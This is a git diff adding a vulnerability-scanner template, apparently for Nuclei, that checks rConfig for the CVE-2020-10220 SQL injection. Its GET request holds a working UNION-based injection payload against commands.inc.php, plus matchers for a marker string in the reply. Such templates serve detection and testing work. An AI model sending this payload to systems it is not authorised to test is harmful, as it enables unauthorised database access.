diff --git a/cves/2020/CVE-2020-10220.yaml b/cves/2020/CVE-2020-10220.yaml new file mode 100644 index 0000000000..bb6ad58ad6 --- /dev/null +++ b/cves/2020/CVE-2020-10220.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-10220 +info: + name: rConfig SQLi + author: madrobot + severity: high + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220 + tags: SQLI + + + +requests: + - method: GET + path: + - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)%20limit%200,1),NULL--" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "[project-discovery]" + part: body